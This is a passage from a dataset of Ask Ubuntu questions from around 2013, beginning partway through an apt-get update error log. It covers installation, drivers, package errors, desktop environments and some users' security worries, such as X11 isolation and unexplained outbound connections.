//security.ubuntu.com precise-security/universe translationindex hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex ign http : //dl.google.com stable/main translation-en_us hit http : //archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //archive.ubuntu.com precise-updates/main i386 packages hit http : //archive.ubuntu.com precise-updates/restricted i386 packages hit http : //archive.ubuntu.com precise-updates/universe i386 packages hit http : //archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages ign http : //dl.google.com stable/main translation-en hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise-backports/main amd64 packages hit http : //archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //archive.ubuntu.com precise-backports/universe amd64 packages hit http : //archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //archive.ubuntu.com precise-backports/main i386 packages hit http : //ppa.launchpad.net precise/main i386 packages hit http : //archive.ubuntu.com precise-backports/restricted i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-backports/universe i386 packages hit http : //archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //archive.ubuntu.com precise-backports/main translationindex hit http : //archive.ubuntu.com precise-backports/multiverse translationindex hit http : //archive.ubuntu.com precise-backports/restricted translationindex hit http : //archive.ubuntu.com precise-backports/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //archive.canonical.com precise/partner translation-en_us hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //archive.canonical.com precise/partner translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-backports/main translation-en hit http : //archive.ubuntu.com precise-backports/multiverse translation-en hit http : //archive.ubuntu.com precise-backports/restricted translation-en hit http : //archive.ubuntu.com precise-backports/universe translation-en err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main amd64 packages 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en w : failed to fetch http : //ppa.launchpad.net/lucid-bleed/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/lucid-bleed/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/lucid-bleed/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
233529	recovering of contacts in samsung galaxy note 2	i saved some contacts in samsung galaxy note 2 and transferred some contacts from my laptop to the galaxy note 2 . but the problem that occured was the contacts which i transferred from the laptop are there in the phone but the contacts which i saved directly in the phone earlier are not there.i have also tried display all option but still they are not shown . how can this happen ? any remedy to recover those contacts if not syncd ? please reply back really soon as those were very important contacts for me .
233534	how do i deal with too many levels of symbolic links ?	i 'm using ubuntu live usb to access my windows files , i 'd like to perform a complete , file by file , backup of the windows c : drive . since i want everything backed up , i 'm doing a copy and paste . copy the c : drive , paste it to the external drive . unfortunately , i 'm running into a problem : i get an error message stating too many levels of symbolic links . what does this mean , and how do i fix it ?
233535	how to run windows-only forex application metatrader in ubuntu ?	after checking some forex sites like agea - trading and investing site , they are giving good business but only run on windows . what i want to know is if there are any kind of forex business application which run under ubuntu ? what is the name of the platform and how do i join that business . i do n't want to go back installing windows to make this business run with me .
233540	gnome-contacts-search-provider using all resources	i noticed that when i use gnome shell activities menu search , my cpu usage on first core jumps to 80 - 100 % . i checked the processes and found that gnome-contacts-search-provider is the cause . what can i do about it ?
233543	how to enable google search for gnome shell ?	it seems that everyone has google search provider for gnome shell by default . but i do n't ! in /usr/share/gnome-shell/search-providers i only have 3 search providers : gnome-contacts , gnome-documents and nautilus search provider ( which is not working , why ? ) . how can i add google search ? i also like to add zeitgeist search . that 's a thing i miss about unity ( gnome 3.6 )
233544	command for deleting temporary files ending with ~	many days ago , i found this useful bash alias ( contents of my ~/.bash_aliases ) # aliases # finds temporary files ending with '~ ' and deletes them alias rm~='find . -name '*~ ' -print0 | xargs -0 /bin/rm -f' now i tried to use rm~ after cd to some directory containing 3 files ending in ~ i got this error in terminal , and files did not get deleted find : paths must precede expression : 1n.in~ usage : find [ -h ] [ -l ] [ -p ] [ -olevel ] [ -d help|tree|search|stat|rates|opt|exec ] [ path ... ] [ expression ] also when i tried rm~ from /home/me , it seems to be doing nothing . or it might be taking a lot of time . please tell me why am i getting error , and how to fix it . thanks !
233545	is there a ubuntu supported x.org alternative ( i.e . with security in mind ) ?	question ( what i am looking for ? ) i am looking for alternatives to x.org , which is the most often used x-server in linux ' graphic systems today ( which means also in ubuntu ) . do you know some alternatives ? i already know about directfb and wayland . with wayland i am not really sure if it can be seen as a replacement-alternative or simple some kind of addon . also i am asking about ubuntu in particular in the question . so i was wondering if there is an alternative ( already packed as a packaged for ubuntu ) . if somebody knows an `` not ubuntu yet '' alternative i would none-the-less appreciate a response as i assume ubuntu is thought to embrace development and progress ( which alternatives might induce ) . thank you . background ( why i am looking for it ? ) the key aspect here is security . while ubuntu offers security in many aspects luks ( linux unified key setup ) for disk encryption apparmor mac ( mandatory access control ) for zero day attacks gnupg ( gnu privacy guard ) signatures , safe mail communication it is sad to know that the x.org server might give away much security . the concern is stated in many places . it is for instance : the x server allows an x client to : - snoop on the screen by reading its contents . - snoop on the keyboard . - take control of other x clients by sending them keyboard and mouse events . - impersonate other x clients by using their names in window title bars . - discover what other x clients are running . - steal the input focus . - deny service by grabbing the pointer or keyboard or the whole server . - deny service by consuming the x server 's resources . strong text source : http : //plash.beasts.org/wiki/x11security the above would mean that some software running in the x-server ( this almost is every program that has a graphical output - is not running on the command line ) can make itself a keylogger . the linux file system is keeping the permissions set and by this user a can be restricted to access user b 's files . in the x.org/x-server it is hard to keep program a from accessing the x-server resources of program b . so by having installed a malicious firefox addon + using a sudo ... on gnome-terminal you might have done enough to give away remote root access . this is why i want to learn / ask about alternatives to x.org 's xserver software ( in ubuntu ) . at best an alternative that keeps the programs graphic resources ( windows , keyboard input ) seperated ! maybe this is some comprisive description of the problem that drives my search for an alternative : http : //theinvisiblethings.blogspot.de/2011/04/linux-security-circus-on-gui-isolation.html
233550	how can i restore template functionality after having deleted the templates folder in 12.10 ?	as many i deleted the templates on a fresh install . i followed the instructions in the accepted answer of what is the templates folder in the home dir for ? i am running 12.10 and the proposed solution to restore the templates functionality does not work . i did reboot . i tried a .templates folder and a templates folder and i played with xdg_templates_dir= '' $ home/templates '' . i added empty libreoffice files etc . all without success . how can i restore template functionality in 12.10 ?
233552	how can i solve an error when booting from a usb ?	i 've been trying to install ubuntu for last 2 days , and have gone through many webpages for help with no avail . here 's what i did : i downloaded unetbootin and used it to mount the 12.10 desktop edition .iso file to 4gb usb . the computer i 'm trying to install does not support usb booting . but by going to hard drives -- > extra plugin in boot many ( f12 ) , it does allow usb booting . and it opens and shows the error invalid or corrupt kernal image boot : . i guess if i give the directive to the booting file which it asks for , it will allow me to install . or what should i do to install it ? this same error has shown before when i tried to install it through cd . the above method is what i tried last . i have tried many ways . by using usb installer , the error is ui directive not found , or something like that . it was caused by my usb being ntfs . edit : i formatted my usb to fat32 . my c : / is already fat32 .
233556	what are the error codes and messages returned for `apt-get update` failures ?	where can i find the error codes returned by a failed apt-get update command ? can you please point me to the code , or specs , that calls out the error messages returned from an apt-get update failure ? thanks . go ahead and ignore the rest of this question if you can answer the first one . bonus points if you can add additional information . what are the recommended solutions to resolve those problems ? currently , i have three error codes that i have commonly encountered and i am wondering if there are more that i should be aware of . no_pubkey badsig 403 forbidden 404 not found duplicate sources.list entry here are the workarounds for the errors that i am aware of : no_pubkey solution : add new public gpg key to my trusted chain by running the command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys < insert pub_key_here > badsig solution : re-add key sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com < insert key here > 403 forbidden solution : ? 404 not found solution : site is unavailable . either wait until site returns , or remove repository from sources.list . duplicate sources.list entry solution : ? how many other error codes are there returned by apt-get update that prevent users from updating their software ? is there documentation somewhere to identify similar issues ? i understand the risks involved when i am implicitly trusting third parties when i am adding their keys to my trusted chain . i am looking to identify the known errors generated by a failed apt-get update and the solutions to allow me to continue to update my packages .
233558	networking security issue with suspicious traffic . how to track it down ?	i have specific problem a bit advanced for me . on my router log i have seen following lines : internal prot . external nat time-out 192.168.0.167:56396 tcp 186.112.54.84:22 60753 54416 192.168.0.167:45776 tcp 62.213.111.201:23 62531 48429 i have re-flashed my router and for few days this lines disappeared , but now they are again here . ok second ip address is from russia today . i have visited the site ( but why telnet port 23 ) and the first one is from columbia dsl user i think . i also have the following line logged : 192.168.0.167:39485 tcp 41.46.0.90:23 62635 53810 the ip is from egypt . i am not able to find the process on ubuntu with netstat . i was also unable to find the given connections . i also tried rkhunter and chkroot but it is too advanced for me . could you give me a hint how to find corresponding processes on ubuntu ( 12.10 ) with ossec installed i get the following lines ( amoung others ) : ** alert 1357654774.6683 : mail - syslog , errors , 2013 jan 08 15:19:34 rr- > /var/log/auth.log rule : 1002 ( level 2 ) - > 'unknown problem somewhere in the system . ' jan 8 15:19:34 rr dbus [ 412 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.62 '' ( uid=1000 pid=2285 comm= '' /usr/lib/indicator-session/indicator-session-servi '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.19 '' ( uid=0 pid=1157 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` )
233559	how to setup grub for raid-1 on already setup 12.04 ?	final objective : two disks , one old , one new . need to setup raid-1 without re-installing ubuntu . system is ubuntu 12.04 . note that i am trying everything in a virtual machine ( virtualbox ) what i have done so far in a nutshell : copied partitions from sda to sdb . formatted the sdb1 to linux raid auto . created raid-array ( md1 ) with sdb1 and one missing drive . created ext4 filesystem for /dev/md1 . configured mdadm . mounted /dev/md1 to /mnt/md1 folder . used rsync to copy everything from / ( filesystem ) to /mnt/md1 now i must configure grub somehow so that it boots from the degraded array which i have setup above ( after reboot i will add sda1 to raid-array ) this is my unsuccessful attempt so far : edit /etc/fstab to replace uuid with /dev/md1 for the / partition edit /etc/mtab to replace /dev/sda1 with /dev/md1 edit /etc/default/grub to set this : grub_disable_linux_uuid=true created a menu entry for grub which is suppose is the main reason while the whole thing failed here is what i see during boot after i select my menu entry error : file not found error : file not found loading linux 3.2.0-34-generic ... error : no such disk . loading initial ramdisk ... error : you need to load the kernel first . press any key to continue ...
233565	how do i find out which programs connect to the internet at startup ?	my installed os is ubuntu 12.10 , 64 bit , english , kernel version 3.5.0.21 which commands must i issue at the terminal window to find out the names of programs that connect to the internet immediately after ubuntu boots up ?
233566	wireless router crashes when connecting from ubuntu only	i bought an acer m3-481 . i am running 12.04 64 bit with an atheros wifi module . my wlan router to which i 'm trying to connect to is a thomson twg850 device . it seems that this device crashes every time i connect to it using this pc only . at the beginning i thought my own wireless module on the notebook would crash . after looking at my mobile phone ( android ) i realised that the router kicks out all devices conntected to it . so after i shut down ubuntu i tried with my w7 pc and everything works fine . furthermore , each time that happens , ubuntu asks me for my wlan key ( wpa ) . ubuntu send out a system report for an internal error stating that the `` wpa supplicant hast crashed '' . i am not sure if this has anything to do with the wpa i am talking about . other forums suggest deactivating n-modus on ubuntu or on the router . this unfortunately doesnt help me . i have been looking in many forums , but theres no real help . a lot of people seem to face the same problem . i am sorry , very new to ubuntu so if you need anymore info about the system , please tell me how to pull those . sorry .
233569	how to troubleshoot a “low graphics mode” installer error on pc with sis igpu ?	how does one troubleshoot a “low graphics mode” error when they are trying to install ubuntu 12.10 on an older computer ? the computer involed is a quite old one : fujistu-siemens scenic p300 pentium 4 2.8 ghz integrated sis 661 graphics controller 2 gb of ram the system ran windows xp smoothly and then its hard drive busted . i have purchased a new hard drive and i am trying to install ubuntu 12.10 . my bios recognizes the hard drive and the computer begins to boot with a boot disk . the screen turns purple , is says ubuntu 12.10 with dots below , i can see a screen with a keyboard and a man . eventually the system goes through cycles in which it seems to be trying different graphics setting ( screen resolution ) . without success , the system gives an error message indicating that it will revert to “low graphics mode” . i hit “ok” the screen turns gray and the installation seems to halt . while i have seen posts on how to deal with “low graphics mode” problems , i have not seen one that grapples with this problem with a system that currently lacks an operating system . other details : i read that when the screen shows the symbol for a keyboard and a man , you can press any key on the keyboard to access an alternative menu . this did not work for me . i can access command lines after the error message .
233570	let 's talk about size	i 'm going to install 12.04 lts , and i 'm wondering : how much disk space the root must have ? people said 6gb but team fortress 2 itself is 11gb . on windows i needed like 180gb for c : \ , but i do n't have as many games on linux . in fact in the next months i 'll only have tf2 and left 4 dead 2 ( about 25gb all togeter ) . so i calculate : / - 25gb + all software i usually install + ... ? it would be / - 140gb ( all games including now and future steam ones + system + software ) /home - 150gb ( music , films , photos , series ) swap - 4gb
233575	how to install network drivers in dell inspiron 5420 ?	i am using dell inspiron 5420 ( 14r 3rd gen ) . wireless and wired works fine in windows 7 , but i do not get any in ubuntu 12.04. lspci gives the following data : 02:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 03:00.0 ethernet controller : atheros i tried using this link answer : drivers are not detected on my dell inspiron 5420 ( 14r 3rd generation ) but i get the following error : bash : ./scripts/driver-select : permission denied
233576	msmtp hangs instead of delivering the message	i 'm trying to configure msmtp ( on ubuntu 12.04 ) . when i 'm trying to send an email , it `` hangs '' ( well , ctrl-c aborts it , so it 's not really a hang , but it seems not to do anything anyway ) . here 's my .msmtprc ( here and further the password and all addresses are correct , of course ) : account wmi host smtp.wmi.amu.edu.pl port 465 auth on user mbork password *** from from @ address account default : wmi when i invoke cat mailtest.txt | msmtp -v to @ address , i get this : ignoring system configuration file /etc/msmtprc : nie ma takiego pliku ani katalogu loaded user configuration file /home/marcin/.msmtprc falling back to default account using account default from /home/marcin/.msmtprc host = smtp.wmi.amu.edu.pl port = 465 timeout = off protocol = smtp domain = localhost auth = choose user = mbork password = * passwordeval = ( not set ) ntlmdomain = ( not set ) tls = off tls_starttls = on tls_trust_file = ( not set ) tls_crl_file = ( not set ) tls_fingerprint = ( not set ) tls_key_file = ( not set ) tls_cert_file = ( not set ) tls_certcheck = on tls_force_sslv3 = off tls_min_dh_prime_bits = ( not set ) tls_priorities = ( not set ) auto_from = off maildomain = ( not set ) from = from @ address dsn_notify = ( not set ) dsn_return = ( not set ) keepbcc = off logfile = ( not set ) syslog = ( not set ) aliases = ( not set ) reading recipients from the command line and nothing happens . ( the file mailtest.txt looks like this : to : to @ address from : from @ address subject : a test msmtp testing ) what might cause this problem ?
233580	what window managers ( or desktop environments ) can group window icons in the taskbar like windows 7 ?	i find it much faster to identify a window in the taskbar ( window list ) by its icon , rather than by its text : the problem with most window managers i 've switched among is that they do n't group windows , and if you have more terminals or file managers , they 'll just clutter the taskbar and you wo n't know which is which . windows 7 offers a relatively elegant solution to this by grouping similar window icons together . question : what linux window managers ( or desktop environments ) have this functionality ? if addons exist that provide it , that 's alright . for reference , a cinnamon applet that sort of does this is window list with app grouping .
233581	defense zone lite segmentation fault when starting	i 'm trying to run defense zone lite version 1.5.2-0ubuntu1 , but i ca n't get it to start properly . running from the terminal , i get this output : $ /opt/defensezone-lite/defense\ zone\ lite found path : /opt/defensezone-lite/defense zone lite mono path [ 0 ] = '/opt/defensezone-lite/defense zone lite_data/managed' mono path [ 1 ] = '/opt/defensezone-lite/defense zone lite_data/mono' /dev/input/js0 : driver version : 2.1.0 ( 20100 ) /dev/input/js0 : fd 4 , buttons 57 , axes 37 , name chicony usb wireless hid receiver stacktrace : native stacktrace : /opt/defensezone-lite/defense zone lite_data/mono/libmono.so ( +0x87b7b ) [ 0xb51d5b7b ] /opt/defensezone-lite/defense zone lite_data/mono/libmono.so ( +0xbabc7 ) [ 0xb5208bc7 ] [ 0xb76e540c ] /opt/defensezone-lite/defense zone lite ( ) [ 0x86351d7 ] /opt/defensezone-lite/defense zone lite ( ) [ 0x843f93a ] /opt/defensezone-lite/defense zone lite ( ) [ 0x841d746 ] /opt/defensezone-lite/defense zone lite ( ) [ 0x8652b12 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0xb712d4d3 ] debug info from gdb : could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf ptrace : operation not permitted . no threads . ================================================================= got a sigsegv while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================================= aborted ( core dumped ) how can i fix this ?
233582	how to make wireless working on hp pavilion g6-2220 ?	i am running ubuntu 12.04 lts on my hp pavilion g6-2220 as only os . i have tried several ways , but still ca n't get my computer to understand the wi-fi button on/or even acknowledge it is there . wired internet works great , but the wireless will not function at all . any help on how to get my wireless up and running ?
233596	what desktop environments feature a searchable `` start '' menu/launcher ?	aside from unity , kde and cinnamon , which of the many desktop environments support incremental search among the start menu items , including not just applications , but recent documents ? that is , which des integrate semantic search systems like synapse ( no longer maintained ) , kupfer or gnome do ? lxde and xfce do not , for example , though in xfce you could press alt+f2 and click the down arrow to search among installed applications ( recent documents are n't added to this menu ) . ( ideally , this menu would be activated when the win/super key was released , which seems almost impossible to achieve , though cinnamon does it )
233598	copying a running physical server to virtual box	i have a server running ubuntu 10.04 . as i want to test some maintenance work , such as upgrading to 12.04 , i thought i should create a vm copy of the server using virtual box . i do n't have a physical access to the server , so i considered the following options : i do dd'ing the entire hard disk to a raw image on my pc and then creating a vdi out of the raw dd image . installing the same ubuntu version , install update and mount the vdi locally and rsync the filesystem from the server to the mounted vdi creating a logical copy of the server . the rsync solution is a bit more complicated , but seems to save bandwidth , and allows me to create a `` copy '' of the server with slightly different configuration ( e.g . smaller disk ) . what do you think is the best way to do so ? one of the above methods ? a different one ?
233599	how can i switch a 64-bit installation to a 32-bit one ?	i want to turn my 64-bit installation into a 32-bit one . so far , i 've tried to install a 32-bit kernel using this command : sudo apt-get install linux-image : i386 linux-image-generic : i386 linux-image-generic-pae : i386 linux-firmware : i386 that command returns the following error : package linux-firmware : i386 is a virtual package provided by : linux-firmware 1.95 [ not candidate version ] e : package 'linux-firmware : i386 ' has no installation candidate i do n't understand this as linux-firmware is available in all architectures , not just i386 : $ apt-cache show linux-firmware | grep filename filename : pool/main/l/linux-firmware/linux-firmware_1.95_all.deb filename : pool/main/l/linux-firmware/linux-firmware_1.34.10_all.deb filename : pool/main/l/linux-firmware/linux-firmware_1.34.7_all.deb filename : pool/main/l/linux-firmware/linux-firmware_1.34.4_all.deb filename : pool/main/l/linux-firmware/linux-firmware_1.34_all.deb
233603	how do i resolve date range events ?	shotwell has grouped a large number of images in a `` date range '' event . i do not know when and how this happened ; the images may have been group this way for a year or so . all new images a event tagged correctly . at any rate : is there a way to move the images to their right event , based on their dates ? dates ( both exif and file system dates ) seem to be correct . i use shotwell version 0.12.3 and has been using it for a couple of years . it works fine , otherwise . per .
233615	what are these programs and why are they connecting to the internet at startup ?	i am new to linux and ubuntu and when i issued the following command at a terminal window : sudo netstat -- inet -p i got the following results : sharon @ sharon : ~ $ sudo netstat -- inet -p [ sudo ] password for sharon : active internet connections ( w/o servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 192.168.1.66:33323 alkes.canonical.co : http established 2505/python tcp 0 0 192.168.1.66:33324 alkes.canonical.co : http established 2505/python tcp 1 0 192.168.1.66:38138 mulberry.canonical : http close_wait 2259/ubuntu-geoip-p tcp 0 0 192.168.1.66:35837 mistletoe.canonica : http time_wait - sharon @ sharon : ~ $ questions : what is python ? can i uninstall it without adverse effects ? what is ubuntu-geoip-p ? can i uninstall it too ? why are the above programs or sub-programs contacting alkes.canonical.co , mulberry.canonical and mistletoe.canonical ? is personally identifiable information being sent to canonical.com ? my installed os is ubuntu 12.10 , kernel version 3.5.0.21 , 64 bit , english .
233626	can i write programs in c # on ubuntu ?	i am forced to learn and practice c # , is there any applications that support and can be used to write programs in c # ?
233627	can not start pc without rescatux ?	i 'm aware that askubuntu is probably not the ideal place to ask this question , but considering that the problem occurred while i was installing ubuntu i 'm guessing others may have run into the problem . i needed to reinstall ubuntu from 12.10 to 12.04 , so i went about the routine , creating a bootable usb , formatting the partition with ubuntu currently installed , and installing it anew . upon reboot i get the grub rescue fault , only with a little twist , this time it says : error , no such device : < # # # # > grub rescue > i quickly make a rescatux bootable usb on another pc and try and restore mbr through it . i still get the error , but this time grub shows up if the computer is booted with the usb inserted . any thoughts ?
233630	how can i play diablo 3 on playonlinux ? direct3d9 is not available without opengl	i have recently encountered a huge problem when installing diablo 3 on playonlinux ( pol ) . the game launch menu started but when i click on the play button the window close immediately and there is just diablo iii.exe process running in background . the debugging console of playonlinux showed during the process : direct3d9 is not available without opengl . i suspect that the 32bit nvidia opengl lib is not installed or loaded . my first question is how do i install the nvidia-glx package without gettng the following error ? reading package lists ... done building dependency tree reading state information ... done package nvidia-glx is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'nvidia-glx ' has no installation candidate currently , i am running ubuntu 12.04 lts ( precise ) using quadro 2000m with the latest nvidia driver 310.19 installed ( thinkpad w520 ) . i am pretty sure i have installed opengl 32bit libraries during the driver installation in recovery mode , but somehow this still does n't work . following is the xorg.conf file generated by the nvidia-xconfig . is this configuration correct or do i need to modify it to load glx module ? # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 310.19 ( buildmeister @ swio-display-x86-rhel47- 08.nvidia.com ) thu nov 8 02:09:12 pst 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection any suggestion and help to solve this problem is much appreciated .
233631	what is the difference between mono and mono develop ?	i am curious to know what exactly is the difference between mono software and monodevelop . and do i need both of these if i want to do `` c # '' ?
233637	can déjà dup backup all the applications ?	déjà dup backup usually backups the home folder . is there anyway that it would backup my whole system ( including all the applications ) ? how can i do that ? suppose if my system crashes and i had to backup , i need it to be the same as before after the restore from the backup is done . that is my intention . how can i do that ?
233642	is it safe to delete preinstalled mysql databases like information_schema ?	i just installed the lamp server and phpmyadmin . once i logged in i noticed databases already created and within them tons of tables and rows . my question of course is whether i can just delete them all without failing the system in any way . below you see what i saw once i entered the first database .
233645	behringer usb guitar link , how to ?	i have a usb guitar link as stated in the title , and can not get the thing to work with ubuntu . the device is connected and running but i get no sound through the guitar . i know it uses a aiso driver for windows if that helps .
233647	can i keep my files on windows xp if i install ubuntu side by side with it ?	i want to install ubuntu using the windows installer on my old hp running windows xp . if i do not delete xp ( so i have to choose what os i want each time i boot ) , will all the files and programs on xp be deleted ? if not will i be able to access them through ubuntu or will i have to load up xp to get at them ?
233649	how to clear jupiter 's notification ?	i used an external display some time before . after that there is a notification of 'new resolution ' everytime the startup of my xfce . look like this : this is really annoying , so i want to know how to clear the notification ? i have reinstalled the jupiter , it does n't work . thanks .
233656	enabling volume renaming in quantal	i partitioned my vaio with ubuntu 12.10 ( simple gnome environment ) so that i have 2 separate volumes for folders and file keeping ( call it a long paranoid windows using effect : ) ) . these two volumes now act as mountable/unmountable volumes which is fine , still , wish there was a way to renaming them to my usual names ( now they are named âvolume xgoâ ) . however , renaming these volumes is disabled as an option on right click , so , if anyone knows how to solve this , thanks .
233662	how do i remove ace-of-penguins without removing lubuntu-desktop ?	i desperately need to get more disk space and i thought i should remove ace-of-penguins . but when i try to remove it in synaptic it wants me to mark lubuntu-desktop for removal as well . ( this also happens when i try to remove abiword and anything else that came with lubuntu . )
233663	how do i disable the discrete graphics and force the use of my integrated intel hd graphics on an hp envy 15t-3200 ?	i have been trying to blacklist my open source amd radeon driver so that my system will use only the intel hd 4000 ivy bridge graphics . what is the proper procedure ? i am using xserver-xorg-video-ati , currently . the settings in the bios of my hp envy 15t-3200 machine does not show any configuration option for disabling the discrete graphics card , unfortunately , so i 'm looking for a way to do this in the os . the bios on my laptop ( hp envy 15t-3200 ) does not have a bios option for disabling , or choosing , which adapter i 'd like to use exclusively . vgaswitcheroo does not apply to my hardware configuration .
233664	how to install chrome or chromium 32 bit on ubuntu 64 bit	i am unable to find any advice how to install either chrome or chromium 32 bit on ubuntu 64 bit 12.10 . i installed ia32-libs , downloaded chrome install package google-chrome-stable_current_i386.deb and tried to install with command : dpkg -i -- force-architecture google-chrome-stable_current_i386.deb ... but it failed with errors : # dpkg -i -- force-architecture /home/stepank/downloads/google-chrome-stable_current_i386.deb selecting previously unselected package google-chrome-stable . ( reading database ... 253612 files and directories currently installed . ) unpacking google-chrome-stable ( from ... /google-chrome-stable_current_i386.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on libgconf2-4 ( > = 2.27.0 ) . google-chrome-stable depends on libnss3-1d ( > = 3.12.3 ) . google-chrome-stable depends on xdg-utils ( > = 1.0.2 ) . dpkg : error processing google-chrome-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for man-db ... errors were encountered while processing : google-chrome-stable any advice would be helpful . edit : i forgot to mention guide i was using : http : //superuser.com/questions/346775/errors-on-attempting-to-install-32-bit-chrome-in-64-bit-ubuntu edit 2 : i lost my reason to install 32 bit version - memory consumption will sadly be the same . see alvar 's answer bellow .
233665	how do i remove a stuck nvidia-settings-experimental-310 package ?	when i boot up my linux box , i get the following message every time : sorry a problem occurred while installing software package : nvidia-settings-experimental-310 . i have older video card nvidia 7300 le that only supports the 304 drivers and would like to resolve this error . the software package : nvidia-settings-experimental-310 does n't seem to be installed but its attempting to and i would like to remove this package . how can i remove this package ?
233666	why is my display getting garbled ?	i recently installed the latest ubuntu version 12.10 on my usb stick and booted my laptop with it . the os runs just fine and as expected but there are a few niggles though ! sometimes when i start a program or open a folder , suddenly the screen gets all garbled for a while . it returns to normal when i take a screenshot of it or whenever i simply refresh the screen . would appreciate if someone could tell me why this is happenning on an almost regular basis . if i can get over this issue then i 'll surely not mind installing the os on my computer . i 've been a windows user all my life and now i would love to explore the world of linux as well . screenshot here :
233668	rm : can not remove `/run/user/root/gvfs ' : is a directory	whenever i type a command which is similar to sudo apt-get install or anything like this i get this kind of error : $ sudo su # exit exit rm : can not remove `/run/user/root/gvfs ' : is a directory how can i resolve it ?
233676	how should i go about demonstrating ubuntu on someone else 's system ?	my relative saw me using ubuntu and asked me about it . i suggested him to try it . he asked me to show it in his pc , to try it . i recommended him to use the live usb stick and try with it or install it as an app in windows . i have an windows 7 pc as his is an windows xp so i do n't want to take any risks , if something goes wrong i 'll be blamed ! these are the system specifications : operating system : microsoft windows xp professional 32-bit sp2 cpu : intel pentium e5700 @ 3.00ghz ram : 2.00 gb dual-channel ddr2 @ 399mhz motherboard : intel corporation dg41rq ( j2e1 ) graphics : e2041 ( 1280x720 @ 60hz ) , intel g41 express chipset hard drives : 233gb seagate st250dm000-1bd141 ( sata ) so how do i go about doing it , he has few pcs to run at office and at home . so which version of ubuntu would suite him and which would be the best way to let him try it ( live usb or as an application or otherwise ) ? please help me , and explain the process in detail .
